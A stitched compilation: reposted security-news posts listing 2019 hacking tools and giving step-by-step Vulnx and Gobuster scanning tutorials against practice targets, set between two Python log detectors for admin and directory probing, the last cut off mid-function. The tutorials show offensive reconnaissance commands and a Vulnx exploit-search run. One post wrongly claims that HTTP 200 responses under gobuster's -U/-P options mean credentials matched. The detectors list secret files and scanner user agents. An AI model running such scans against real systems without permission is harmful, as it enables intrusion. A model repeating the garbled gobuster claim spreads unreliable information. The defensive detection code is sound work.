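    """Lower-case, drop the query string and trailing slash so /Admin/ and /admin match."""
    path = path.split("?", 1)[0].lower().rstrip("/")
    return path or "/"


def load_admin_paths(text: str) -> set:
    """Turn the '%s/...' list entries into a set of normalized request paths."""
    return {normalize(line.strip()[2:]) for line in text.splitlines() if line.strip().startswith("%s")}


def detect_admin_probing(log_text: str, admin_paths: set, min_distinct: int = 5,
                         window: timedelta = timedelta(minutes=5)) -> dict:
    """Flag source IPs requesting at least min_distinct distinct admin paths within window."""
    events = defaultdict(list)                      # ip -> [(timestamp, path, status)]
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                                # not a combined-format line
        path = normalize(m["path"])
        if path in admin_paths:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            events[m["ip"]].append((ts, path, int(m["status"])))
    alerts = {}
    for ip, hits in events.items():
        hits.sort()
        for i, (start, _, _) in enumerate(hits):    # sliding window over the hits
            in_window = [h for h in hits[i:] if h[0] - start <= window]
            distinct = {p for _, p, _ in in_window}
            if len(distinct) >= min_distinct:
                alerts[ip] = {
                    "distinct_paths": sorted(distinct),
                    "not_found": sum(1 for _, _, s in in_window if s == 404),
                    "found": sorted({p for _, p, s in in_window if s == 200}),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_admin_probing(SAMPLE_LOG, load_admin_paths(ADMIN_LINKS)).items():
        print(ip, info)
```

The "found" entries of an alert are the paths the scanner actually reached, which is the list a defender should review for missing authentication or access restriction.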

List of Top Hacking Tools of 2019
https://www.securitynewspaper.com/2019/12/12/list-of-top-hacking-tools-of-2019/
Thu, 12 Dec 2019 16:32:33 +0000

Most tools are used to do vulnerability assessment and penetration testing of the target application or system. Generally most tools are found on GitHub, an open source community. We will show you some commonly listed tools which were used by many ethical hacking experts of the International Institute of Cyber Security in 2019.

This covers tools from the following areas: ethical hacking, digital forensics and reverse engineering.

Top Ethical Hacking Tools

NMAP

Nmap is very popular among pentesters and security researchers. Nmap scans a server for open ports and services at any IP address. Nmap sends a number of packets and relies on the responses. Nmap has a number of options for scanning any IP address. The tool has been developed for different OS platforms, and Nmap also has a GUI version.

(screenshot: Nmap CUI / Nmap GUI)

For downloading the tool go to: https://nmap.org/

WPSCAN

WPScan is used to find vulnerabilities in WordPress websites. The tool is known for scanning for vulnerabilities within the core version, plugins and themes of a WordPress website. WPScan even finds weak passwords, users and security configuration issues that are present on the web application.

(screenshot: WPScan)

For downloading WPScan: https://github.com/wpscanteam/wpscan

TRAPE

Trape is an OSINT research tool used for tracking people and executing social engineering attacks in real time. Trape was developed to show how large internet companies can obtain confidential information. Trape can collect information such as website sessions and services to control users through their browsers without telling them. Its main aim is to help government organizations, researchers and companies find cyber criminals.

(screenshot: Trape)

For downloading Trape: https://github.com/jofpin/trape

OSMEDEUS

Osmedeus is a fully automated offensive tool used for vulnerability scanning and reconnaissance. It allows you to run a bunch of different scans together and find vulnerabilities in your target. Some features provided by Osmedeus are subdomain scanning, screenshotting the target, basic recon like whois and dig info, and many other features required in the initial phases of pentesting.

(screenshot: Osmedeus)

For downloading Osmedeus: https://github.com/j3ssie/Osmedeus

Metasploit

Metasploit is another popular tool, used for social engineering attacks and getting reverse shells. The tool is available for all popular platforms. Metasploit comes with pre-built payloads which are used for testing. Metasploit is a widely used tool and there are many contributors who have helped it grow. You can also opt for Kali Linux, where you will find Metasploit pre-installed.

(screenshot: Metasploit)

For downloading Metasploit: https://github.com/rapid7/metasploit-framework

Top Digital Forensics Tools

SANS-SIFT

SIFT is a collection of forensics toolkits based on Ubuntu. It includes all the tools you need for forensics and incident response. SIFT can also perform advanced investigations and respond to intrusions using open source tools. SIFT supports many different formats such as the Advanced Forensic Format and raw formats, and offers other features such as building a timeline from system logs. SIFT provides cross compatibility between Windows and Linux.

(screenshot: SANS SIFT)

For downloading SIFT: https://digital-forensics.sans.org/community/downloads

X-Ways Forensics

X-Ways Forensics is an advanced work environment for computer forensics. It is a very reliable and lightweight tool that uses minimal resources. The tool finds deleted files and offers many features that other forensics tools lack. X-Ways Forensics runs from a USB stick on any Windows OS. It offers disk cloning and imaging, and can read partitioning and file system structures inside raw images.

(screenshot: X-Ways Forensics)

Download X-Ways Forensics: http://www.x-ways.net/forensics/

The Sleuth Kit & Autopsy

The Sleuth kit comes with bunch of command line linux tools which analyze different disk images & recover files from disk images. The Sleuth kit is used to find file system data. The plug in allows to incorporate modules. Autopsy is GUI based program used to analyze hard drives & other storage devices. Autopsy has plugin architecture which helps to find modules or develop custom modules.


Download The Sleuth Kit & Autopsy : https://www.sleuthkit.org/autopsy/

Helix

Helix is a live-CD based forensic suite used in incident response. It comes with many open source digital forensic tools, including hex editors, data carving and password cracking tools. Helix collects data from physical memory, network connections, user accounts and many other sources, then analyzes it and compiles the results into reports.


For downloading Helix : https://www.e-fense.com/products.php

CAINE

CAINE (Computer Aided INvestigative Environment) is another Linux distribution which contains many digital forensics tools. Later versions of CAINE are based on Ubuntu Linux. CAINE offers a user-friendly interface and an environment optimized for conducting forensic analysis. It bundles digital forensic tools such as FTK Imager Lite, a hex editor, NirSoft utilities and many others used to gather or recover files.


Download CAINE : https://www.caine-live.net/

Top Reverse Engineering Tools

OllyDbg

OllyDbg is a 32-bit assembler-level debugger used for analyzing Windows executables. With OllyDbg you can trace registers and find procedures, loops, API calls, tables and much more. OllyDbg can debug multi-threaded applications. It supports the MASM and IDEAL formats.


Download OllyDbg : http://www.ollydbg.de/

Ghidra

Ghidra is a popular reverse engineering tool, used by the NSA for analyzing suspicious or malicious executables. Ghidra reverses an executable back into readable code. It helps in analyzing malware, bugs and viruses, and gives reverse engineers and pentesters a proper understanding of a binary.


Download Ghidra : https://ghidra-sre.org/

Distorm3

diStorm3 is designed as a fast, lightweight decomposer library. It disassembles instructions in 32 and 64-bit modes. diStorm3 is described as the fastest disassembler library and offers clean, readable source code. It depends on nothing beyond the C library, which is why it can be used in kernel modules.


Download diStorm3 : https://github.com/gdabah/distorm

IDA Pro

IDA is designed for static analysis, in contrast to debuggers such as OllyDbg and x64dbg. IDA is a cross-platform disassembler, mostly used in professional work. You can use its non-commercial version for reverse engineering; for commercial use you have to purchase a commercial license. IDA Pro offers a powerful disassembler, supports different operating systems and the x86 and x64 architectures, and contains built-in debuggers.


Download IDA Pro : https://www.hex-rays.com/products/ida/

WinHex

WinHex is a hexadecimal editor, able to open Windows executables and other files. WinHex is mostly used by computer forensic investigators. It consumes little memory and recovers deleted files from hard disks. WinHex also works with floppy disks, CD-ROMs and DVDs, supports different file formats, and provides access to physical RAM and other resources.


Download WinHex : https://www.x-ways.net/winhex/

Top Mobile Hacking Tools

Kali Linux Net Hunter

Kali Linux is the most popular OS for penetration testing and is used by many security researchers. To crack WiFi passwords you install Kali Linux together with Wifite. Kali Linux NetHunter runs on most Android devices, and Linux needs very little memory to run.


Download Kali Linux NetHunter : https://www.offensive-security.com/kali-linux-nethunter-download/

Reaver For Android

Reaver is a popular application for cracking WiFi passwords. Users don't need any technical expertise to crack WiFi passwords with such applications. Reaver offers easy-to-use features: users can view the list of access points and stations, see the activity of a specific user, and identify the manufacturer of any AP device. It saves captured packets in a .cap file and sends de-authentication frames to all connected users.


Download Reaver : https://forum.xda-developers.com/showthread.php?t=2456888

Dex2jar

dex2jar is designed to decompile Android applications. It reads Dalvik executable (.dex) files.


Download dex2jar : https://github.com/pxb1988/dex2jar

Apktool

apktool is another tool designed for reverse engineering Android APK files. It decodes an APK's resources to nearly their original form. Users can even modify Android applications with apktool and rebuild them. apktool also helps in automating repetitive tasks.


Download apktool : https://github.com/iBotPeaches/Apktool

WifiKill

WifiKill is used to ban other users on the same network. With WifiKill you can block users, grab their traffic, show the websites visited by grabbed devices, and show the network names of devices. WifiKill supports Android versions above 4.x.

Download Wifikill : http://paranoid.me/wifikill/downloader/

The post List of Top Hacking Tools of 2019 appeared first on Information Security Newspaper | Hacking News.

How to find Vulnerabilities in CMS Websites
https://www.securitynewspaper.com/2019/11/27/how-to-find-vulnerabilities-in-cms-websites/
Wed, 27 Nov 2019 14:34:06 +0000

Finding vulnerabilities takes time for a pentester or security researcher. There are many tools and techniques for finding bugs in any URL. Earlier we have shown many tools which are used in the various phases of pentesting. Pentesting always begins with the information gathering phase. According to the ethical hacking researcher of the International Institute of Cyber Security, pentesting has moved towards automation: pentesters use tools to scan for open ports and services. Here we will show a small automation bot which is used for finding vulnerabilities in different types of CMS.

Vulnx is used to find vulnerabilities in different types of CMS. Vulnx scans for subdomains, open ports, IP address, country and region. Vulnx is designed to automate your pentesting.

  • For testing we have used Kali Linux 2018.2. Make sure python3 is installed.
    • Type sudo apt-get update
    • Type sudo apt-get install python3
  • Type git clone https://github.com/anouarbensaad/vulnx.git
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/anouarbensaad/vulnx.git
 Cloning into 'vulnx'…
 remote: Enumerating objects: 35, done.
 remote: Counting objects: 100% (35/35), done.
 remote: Compressing objects: 100% (28/28), done.
 remote: Total 1034 (delta 13), reused 17 (delta 7), pack-reused 999
 Receiving objects: 100% (1034/1034), 505.30 KiB | 410.00 KiB/s, done.
 Resolving deltas: 100% (609/609), done.
  • Type cd vulnx/
  • Type ls
root@kali:/home/iicybersecurity/Downloads# cd vulnx/
root@kali:/home/iicybersecurity/Downloads/vulnx# ls
 CHANGELOG.md  common  docker      LICENSE  README.md         shell      vulnx.py
 cli.py        config  install.sh  modules  requirements.txt  update.sh
  • Type ./install.sh
root@kali:/home/iicybersecurity/Downloads/vulnx# ./install.sh
===== VULNX INSTALL =====
 [+] Vulnx Will Be Installed In Your System
 [+] Installing python3...
Reading package lists... Done
Building dependency tree
Reading state information... Done
python3 is already the newest version (3.7.3-1).
0 upgraded, 0 newly installed, 0 to remove and 664 not upgraded.
Requirement already satisfied: requests in /usr/lib/python2.7/dist-packages (from -r ./requirements.txt (line 1)) (2.21.0)
Collecting bs4 (from -r ./requirements.txt (line 2))
  Downloading https://files.pythonhosted.org/packages/10/ed/7e8b97591f6f456174139ec089c769f89a94a1a4025fe967691de971f314/bs4-0.0.1.tar.gz
Requirement already satisfied: beautifulsoup4 in /usr/lib/python2.7/dist-packages (from bs4->-r ./requirements.txt (line 2)) (4.8.0)
Building wheels for collected packages: bs4
  Running setup.py bdist_wheel for bs4 ... done
  Stored in directory: /root/.cache/pip/wheels/a0/b0/b2/4f80b9456b87abedbc0bf2d52235414c3467d8889be38dd472
Successfully built bs4
Installing collected packages: bs4
Successfully installed bs4-0.0.1
 [+] Checking directories...
 [+] Installing ...
 [+] Creating Symbolic Link ...
 [+] Tool Successfully Installed And Will Start In 5s!
 [+] You can execute tool by typing vulnx



                    .:.        .:,
                   xM;           XK.
                  dx'            .lO.
                 do                ,0.
             .c.lN'      ,  '.     .k0.:'
              xMMk;d;''cOM0kWXl,',locMMX.
              .NMK.   :WMMMMMMMx    dMMc
               lMMO  lWMMMMMMMMMO. lMMO
                cWMxxMMMMMMMMMMMMKlWMk
                 .xWMMMMMMMMMMMMMMM0,
                   .,OMd,,,;0MMMO,.
             .l0O.VXVXOX.VXVX0MOVXVX.0Kd,
            lWMMO0VXVX0OX.VXVXlVXVX.VXNMMO
           .MMX;.N0VXVX00X.VXVXVX0.0M:.OMMl
          .OXc  ,MMOVXVX0VX .VXVX00MMo  ,0X'
          0x.  :XMMMkVXVX.XO.VXVXdMMMWo.  :X'
         .d  'NMMMMMMkVXVX..VXVX0.XMMMMWl  ;c
            'NNoMMMMMMxVXVXVXVXVX0.XMMk0Mc
           .NMx OMMMMMMdVXVXVXlVXVX.NW.;MMc
          :NMMd .NMMMMMMdVXVXdMd,,,,oc ;MMWx
          .0MN,  'XMMMMMMoVXoMMMMMMWl   0MW,
           .0.    .xWMMMMM:lMMMMMM0,     kc
            ,O.     .:dOKXXXNKOxc.      do
             '0c        -VulnX-       ,Ol
               ;.                     :.

    # Coded By Anouar Ben Saad - @anouarbensaad
  • Type chmod 755 requirements.txt vulnx.py
root@kali:/home/iicybersecurity/Downloads/vulnx# chmod 755 requiremnets.txt vulnx.py
  • Type python3 vulnx.py --help
root@kali:/home/iicybersecurity/Downloads/vulnx# python3 vulnx.py --help

usage: vulnx.py [-h] [-u URL] [-D DORKS] [-o OUTPUT] [-t TIMEOUT]
                [-c {user,themes,version,plugins,all}] [--threads NUMTHREAD]
                [-n NUMBERPAGE] [-i INPUT_FILE]
                [-l {wordpress,prestashop,joomla,lokomedia,drupal,all}]
                [-p SCANPORTS] [-e] [--it] [-w] [-d] [--dns]

OPTIONS:
  -h, --help            show this help message and exit
  -u URL, --url URL     url target to scan
  -D DORKS, --dorks DORKS
                        search webs with dorks
  -o OUTPUT, --output OUTPUT
                        specify output directory
  -t TIMEOUT, --timeout TIMEOUT
                        http requests timeout
  -c {user,themes,version,plugins,all}, --cms-info {user,themes,version,plugins,all}
                        search cms info[themes,plugins,user,version..]
  --threads NUMTHREAD   number of threads
  -n NUMBERPAGE, --number-pages NUMBERPAGE
                        search dorks number page limit
  -i INPUT_FILE, --input INPUT_FILE
                        specify input file of domains to scan
  -l {wordpress,prestashop,joomla,lokomedia,drupal,all}, --dork-list {wordpress,prestashop,joomla,lokomedia,drupal,all}
                        list names of dorks exploits
  -p SCANPORTS, --ports SCANPORTS
                        ports to scan
  -e, --exploit         searching vulnerability & run exploits
  --it                  interactive mode.
  -w, --web-info        web informations gathering
  -d, --domain-info     subdomains informations gathering
  --dns                 dns informations gatherings
  • Type python3 vulnx.py -u http://hack.me --dns -d -w -e --output ./hack.me
  • --dns is used to gather DNS information.
  • -d is used to gather subdomain information.
  • -w is used to gather web information.
  • -e is used to search for vulnerabilities & exploits.
root@kali:/home/iicybersecurity/Downloads/vulnx# python3 vulnx.py -u http://hack.me --dns -d -w -e --output ./hack.me

 [Target] => http://hack.me

------------------------------------------------
 [?] looking for cms
 [+] CMS : Lokomedia
------------------------------------------------
------------------------------------------------
 [~] Scanning Ports

   PORTS                     STATUS  PROTO
 [?] 22                    CLOSE   SSH
-----------------------------------------------
 [~] Starting DNS dump
 [!] Retrieved token: 7lMSlFeGREkQtU4PxAkC9E7JuA0wsfXnLpLxG3izLIboqqtCEBFGs2YDRCIMsJLh
 [?] Search for DNS Servers
 [+] Host : ns-113.awsdns-14.com.
 [+] IP : 205.251.192.113
 [+] AS : AMAZON-02
  ----------------
 [+] Host : ns-1428.awsdns-50.org.
 [+] IP : 205.251.197.148
 [+] AS : AMAZON-02
  ----------------
 [+] Host : ns-1869.awsdns-41.co.uk.
 [+] IP : 205.251.199.77
 [+] AS : AMAZON-02
  ----------------
 [+] Host : ns-881.awsdns-46.net.
 [+] IP : 205.251.195.113
 [+] AS : AMAZON-02
  ----------------
 [?] Search for MX Records
 [+] Host : 1 aspmx.l.google.com.
 [+] IP : 172.217.197.27
 [+] AS : GOOGLE
  ----------------
 [+] Host : 10 alt3.aspmx.l.google.com.
 [+] IP : 64.233.184.27
 [+] AS : GOOGLE
  ----------------
 [+] Host : 10 alt4.aspmx.l.google.com.
 [+] IP : 172.217.218.26
 [+] AS : GOOGLE
  ----------------
 [+] Host : 5 alt1.aspmx.l.google.com.
 [+] IP : 64.233.186.26
 [+] AS : GOOGLE
  ----------------
 [+] Host : 5 alt2.aspmx.l.google.com.
 [+] IP : 209.85.202.26
 [+] AS : GOOGLE
  ----------------
-----------------------------------------------
 [~] Check Vulnerability
  • The output above shows the CMS detected for the target URL. Vulnx then scanned for open ports and retrieved a token for the DNS dump.
  • It then listed the DNS and MX servers with their respective hosts, IP addresses and AS names. Such basic information can also be retrieved with nslookup.
  • Here, however, vulnx automates finding all the DNS servers.
  • You can scan websites running other CMSs in the same way.

Bruteforce Any Website With GoBuster, Step-By-Step Guide
https://www.securitynewspaper.com/2019/11/04/bruteforce-any-website-with-gobuster-step-by-step-guide/
Tue, 05 Nov 2019 03:08:51 +0000

While enumerating any web application, the initial step is to collect as much information as possible about the target: its open ports, services and directories. According to the ethical hacking researcher of the International Institute of Cyber Security, collecting such information makes it easier to prepare for the next pentesting phase. That's why Gobuster is used to extract information about the target. Gobuster is written in Go and does the same job as very common scanners like DirBuster.

  • For testing we are using Kali Linux 2019.1 amd64. Open a terminal and type
    • sudo apt-get update
    • sudo apt-get install gobuster
  • After installation type gobuster
root@kali:/home/iicybersecurity/Downloads# gobuster
 Usage:
   gobuster [command]
 Available Commands:
   dir         Uses directory/file brutceforcing mode
   dns         Uses DNS subdomain bruteforcing mode
   help        Help about any command
   vhost       Uses VHOST bruteforcing mode
 Flags:
   -h, --help              help for gobuster
   -z, --noprogress        Don't display progress
   -o, --output string     Output file to write results to (defaults to stdout)
   -q, --quiet             Don't print the banner and other noise
   -t, --threads int       Number of concurrent threads (default 10)
   -v, --verbose           Verbose output (errors)
   -w, --wordlist string   Path to the wordlist

Finding Files/ Directories

  • On the target side we will be using DVWA (Damn Vulnerable Web Application). Download from https://www.vulnhub.com/entry/damn-vulnerable-web-application-dvwa-107,43/
  • Type gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt
  • -u is used to assign target URL, 192.168.1.105 is our target/DVWA.
  • -w is used to assign wordlist. /usr/share/wordlists/dirb/common.txt is the wordlist location.
root@kali:/home/iicybersecurity# gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Timeout:        10s
 2019/11/01 01:20:19 Starting gobuster
 /.hta (Status: 403)
 /.svn (Status: 301)
 /.htpasswd (Status: 403)
 /.svn/entries (Status: 200)
 /.htaccess (Status: 403)
 /css (Status: 301)
 /images (Status: 301)
 /includes (Status: 301)
 /js (Status: 301)
 2019/11/01 01:20:25 Finished
  • The query above has found the files & directories from the wordlist that exist under the target URL.

Printing Files With Full Path

  • Type gobuster dir -e -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt
  • -e is used to print full path of the files.
  • -u is used to assign target URL 192.168.1.105 is our target.
  • -w is used to assign wordlist. /usr/share/wordlists/dirb/common.txt is the wordlist location.
root@kali:/home/iicybersecurity# gobuster dir -e -u  http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Expanded:       true
 [+] Timeout:        10s
 2019/11/01 01:21:34 Starting gobuster
 http://192.168.1.105/dvwa/.hta (Status: 403)
 http://192.168.1.105/dvwa/.htpasswd (Status: 403)
 http://192.168.1.105/dvwa/.svn (Status: 301)
 http://192.168.1.105/dvwa/.htaccess (Status: 403)
 http://192.168.1.105/dvwa/.svn/entries (Status: 200)
 http://192.168.1.105/dvwa/css (Status: 301)
 http://192.168.1.105/dvwa/images (Status: 301)
 http://192.168.1.105/dvwa/includes (Status: 301)
 http://192.168.1.105/dvwa/js (Status: 301)
 2019/11/01 01:21:39 Finished
  • Above you can see the full URL of each discovered path. This query helps in the initial information gathering stage.

Printing Output Using Verbose

  • Type gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -v
  • -u is used to assign target URL. 192.168.1.105 is our target.
  • -w is used to assign wordlist. /usr/share/wordlists/dirb/common.txt is the wordlist location.
  • -v is used for verbose mode.
root@kali:/home/iicybersecurity# gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -v
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Verbose:        true
 [+] Timeout:        10s
 2019/11/01 01:33:32 Starting gobuster
 Missed: /.bashrc (Status: 404)
 Missed: /.cvs (Status: 404)
 Missed: /.cvsignore (Status: 404)
 Missed: /.forward (Status: 404)
 Missed: /.config (Status: 404)
 Missed: /.git/HEAD (Status: 404)
 Missed: /.cache (Status: 404)
 Found: /.hta (Status: 403)
 Missed: /.profile (Status: 404)
 Missed: /.history (Status: 404)
 Missed: /.mysql_history (Status: 404)
 Missed: /.passwd (Status: 404)
 Missed: /.listings (Status: 404)
 Missed: /.perf (Status: 404)
 Missed: /.sh_history (Status: 404)
 Found: /.htpasswd (Status: 403)
 Missed: /.listing (Status: 404)
 Missed: /.rhosts (Status: 404)
 Found: /.svn/entries (Status: 200)
 Missed: /.subversion (Status: 404)
 Missed: /.ssh (Status: 404)
 Missed: /.web (Status: 404)
 Missed: /archive (Status: 404)
 Found: /.svn (Status: 301)
 Missed: /@ (Status: 404)
 Missed: /.swf (Status: 404)
 Found: /.htaccess (Status: 403)
 Missed: /_backup (Status: 404)
 Missed: /.bash_history (Status: 404)
 Missed: /_adm (Status: 404)
 Missed: /_borders (Status: 404)
 Missed: /_cache (Status: 404)
 Missed: /_admin (Status: 404)
 Missed: /_baks (Status: 404)
 Missed: /_catalogs (Status: 404)
 Missed: /_code (Status: 404)
 Missed: /_assets (Status: 404)
 Missed: /_common (Status: 404)
 Missed: /_conf (Status: 404)
 Missed: /_ajax (Status: 404)
 Missed: / (Status: 404)
 Missed: /_files (Status: 404)
 Missed: /_css (Status: 404)
 Missed: /_data (Status: 404)
 Missed: /_database (Status: 404)
 Missed: /_db_backups (Status: 404)
 Missed: /_derived (Status: 404)
 Missed: /_dev (Status: 404)
 Missed: /_config (Status: 404)
 Missed: /_flash (Status: 404)
 Missed: /_dummy (Status: 404)
 Missed: /_inc (Status: 404)
 Missed: /_fpclass (Status: 404)
 Missed: /_includes (Status: 404)
 Missed: /_install (Status: 404)
 Missed: /_images (Status: 404)
 Missed: /_js (Status: 404)
 Missed: /_layouts (Status: 404)
 Missed: /_img (Status: 404)
 Missed: /_lib (Status: 404)
 Missed: /_media (Status: 404)
 Missed: /_mm (Status: 404)
 Missed: /_mygallery (Status: 404)
  • The query above ran in verbose mode, showing the HTTP status code of every request, including the misses.

Printing Files with No Status

  • Type gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -n
  • -u is used to assign target URL. 192.168.1.105 is our target URL.
  • -w is used to assign wordlist. /usr/share/wordlists/dirb/common.txt is the wordlist location.
  • -n is used to print with no status codes.
root@kali:/home/iicybersecurity# gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -n
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] No status:      true
 [+] Timeout:        10s
 2019/11/01 02:36:35 Starting gobuster
 /.hta
 /.htpasswd
 /.svn
 /.svn/entries
 /.htaccess
 /css
 /images
 /includes
 /js
 2019/11/01 02:36:38 Finished
  • The query above printed the results without any status codes.

Finding Length of the Response Files

  • Type gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -l
  • -u is used to assign target URL. 192.168.1.105 is our target URL.
  • -w is used to assign wordlist location. -w /usr/share/wordlists/dirb/common.txt is our wordlist location.
  • -l is used to show the length of each response.
root@kali:/home/iicybersecurity# gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -l
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Show length:    true
 [+] Timeout:        10s
 2019/11/01 02:57:45 Starting gobuster
 /.hta (Status: 403) [Size: 1108]
 /.htpasswd (Status: 403) [Size: 1108]
 /.svn/entries (Status: 200) [Size: 256]
 /.htaccess (Status: 403) [Size: 1108]
 /.svn (Status: 301) [Size: 416]
 /css (Status: 301) [Size: 415]
 /images (Status: 301) [Size: 418]
 /includes (Status: 301) [Size: 420]
 /js (Status: 301) [Size: 414]
 2019/11/01 02:57:48 Finished
  • The output above shows the response sizes. From these an attacker can infer what kind of files the target uses to run its website, and, as per the digital forensics expert of the International Institute of Cyber Security, file size is also one of the parameters used when analyzing malware.

Finding Files With Specific Extension

  • Type gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -x .php
  • -u is used to assign URL. 192.168.1.105 is our target URL
  • -w is used to assign wordlist. -w /usr/share/wordlists/dirb/common.txt is wordlist location.
  • -x appends the given extension to each wordlist entry; here files ending in .php will be searched for.
root@kali:/home/iicybersecurity# gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -x .php
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Extensions:     php
 [+] Timeout:        10s
 2019/11/01 03:32:20 Starting gobuster
 /.hta (Status: 403)
 /.hta.php (Status: 403)
 /.htpasswd (Status: 403)
 /.htpasswd.php (Status: 403)
 /.htaccess (Status: 403)
 /.htaccess.php (Status: 403)
 /.svn/entries (Status: 200)
 /.svn (Status: 301)
 /css (Status: 301)
 /images (Status: 301)
 /includes (Status: 301)
 /js (Status: 301)
 2019/11/01 03:32:25 Finished
  • The query above searched for files with the .php extension. This shows which file types the target serves, which an attacker can use when crafting malicious files for that extension.

Finding Username & Password

  • Type gobuster dir -u http://testphp.vulnweb.com/login.php -w /usr/share/wordlists/dirb/common.txt -U test -P test
  • -u is used to assign the URL. http://testphp.vulnweb.com/login.php is our target URL.
  • -w is used to assign the wordlist. /usr/share/wordlists/dirb/common.txt is the wordlist location.
  • -U is for the username & -P is for the password, sent as HTTP basic authentication.
root@kali:/home/iicybersecurity# gobuster dir  -u http://testphp.vulnweb.com/login.php -w /usr/share/wordlists/dirb/common.txt -U test -P test
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://testphp.vulnweb.com/login.php
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Auth User:      test
 [+] Timeout:        10s
 2019/11/01 04:31:34 Starting gobuster
 /admin.php (Status: 200)
 /index.php (Status: 200)
 /info.php (Status: 200)
 /phpinfo.php (Status: 200)
 /xmlrpc.php (Status: 200)
 /xmlrpc_server.php (Status: 200)
 2019/11/01 04:32:54 Finished
  • The query above returned status 200 for these paths, which means that the username & password matched.
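The runs above leave a distinctive footprint in the web server's access log: a burst of requests from one client, most of them answered with 404, the default User-Agent gobuster/3.0.1 shown in the banner, and probes for names such as .htpasswd and .svn/entries that no ordinary visitor requests. The following Python script is an added example, not code from the original post or from the Gobuster project. It parses a few constructed Apache combined-format log lines (the client addresses 10.0.0.5 and 10.0.0.9, the 60-second window and the threshold of 20 misses are assumptions chosen for the example) and flags the scanning client on all three signals while leaving the normal browser session alone.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" log format (regex written for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Names from the gobuster results above that a legitimate visitor never requests.
SENSITIVE_SUFFIXES = ("/.htpasswd", "/.htaccess", "/.svn/entries", "/.git/HEAD", "/.bash_history")
# User-Agent prefixes of common directory brute-forcers (gobuster sends "gobuster/<version>").
SCANNER_UA_PREFIXES = ("gobuster", "dirbuster", "dirb")


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect_bruteforce(lines, window_seconds=60, miss_threshold=20):
    """Return {client_ip: [reasons]} for clients whose traffic looks like a directory brute-force."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            per_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in per_ip.items():
        reasons = []
        # 1. Burst of 404s: sliding window over the timestamps of missed requests.
        misses = sorted(r["ts"] for r in recs if r["status"] == 404)
        start = 0
        for end in range(len(misses)):
            while misses[end] - misses[start] > timedelta(seconds=window_seconds):
                start += 1
            if end - start + 1 >= miss_threshold:
                reasons.append(f"{end - start + 1}+ 404 responses within {window_seconds}s")
                break
        # 2. A scanner identifying itself in the User-Agent header.
        scanner_uas = sorted({r["ua"] for r in recs if r["ua"].lower().startswith(SCANNER_UA_PREFIXES)})
        if scanner_uas:
            reasons.append("scanner user agent: " + ", ".join(scanner_uas))
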